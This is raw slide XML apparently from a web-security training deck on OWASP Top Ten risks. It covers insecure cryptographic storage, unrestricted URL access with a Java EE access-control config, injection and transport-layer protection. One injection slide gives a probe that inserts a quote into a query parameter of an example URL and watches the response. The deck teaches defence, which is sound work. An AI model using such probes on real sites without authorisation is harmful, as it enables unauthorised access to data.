                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>36</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49856814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A7. Insecure Cryptographic Storage</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1199728"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Failing to encrypt sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>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Unsafe key generation and storage</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Rotation of keys</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Using weak algorithms</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37</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14840389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2400" y="152400"/>
            <a:ext cx="7010400" cy="715963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing Insecure Cryptographic Storage</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1271736"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What are the every day usage of cryptography that you can think of ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ensure that everything that should be encrypted is actually encrypted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Only use approved public algorithms such as AES, RSA public key cryptography and SHA-256</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Generate keys offline and store private keys with extreme care</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hashing is not encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good practice is to never store unnecessary data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="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38</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764937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in)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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in)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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amond(in)">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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amond(in)">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A8. Failure to Restrict URL Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. </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Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.bank.com/admin.asp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Evaluating privileges on the client but not on the server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	“Attack on MacWorld2007, approved platinum passes worth $1700”</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39</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9924301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 Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="990600"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	Injection occurs when untrusted data is sent to an interpreter as part of a command or query. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Any input field whose values are used to craft a SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.site.com/readArticle.jsp?id=42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Insert (‘) or 4’2 instead of 42 and look for the response</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00580522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8600" y="152400"/>
            <a:ext cx="7010400" cy="715963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing Failure to Restrict URL Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1143000"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ensure the access control matrix is part of the business, architecture, and design of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ensure that all URLs and business functions are protected by an effective access control mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do not assume that users will be unaware of special or hidden URLs or APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Block access to all file types that your application should never serve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set up a security policy and enable the Java security manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use the OWASP Enterprise Security API classes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AccessController</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Acegi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Security, a Java EE security framework for authentication and authorization</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40</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97413269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2400" y="152400"/>
            <a:ext cx="7010400" cy="715963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing Failure to Restrict URL Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="838200"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;security-constraint&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;web-resource-collection&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;web-resource-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Java EE Application protected Admin pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/web-resource-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;description&gt;Require users to authenticate.&lt;/description&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-pattern&gt;/admin/*&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-pattern&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/web-resource-collection&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;auth-constraint&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;description&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Allow Manager role to access Admin pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/description&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;role-name&gt;Manager&lt;/role-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/auth-constraint&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/security-constraint&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;security-role&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;description&gt;Java EE Managers&lt;/description&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;role-name&gt;Manager&lt;/role-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/security-role&gt;</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41</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426297317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448128" cy="715963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A9. Insufficient Transport Layer Protection	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
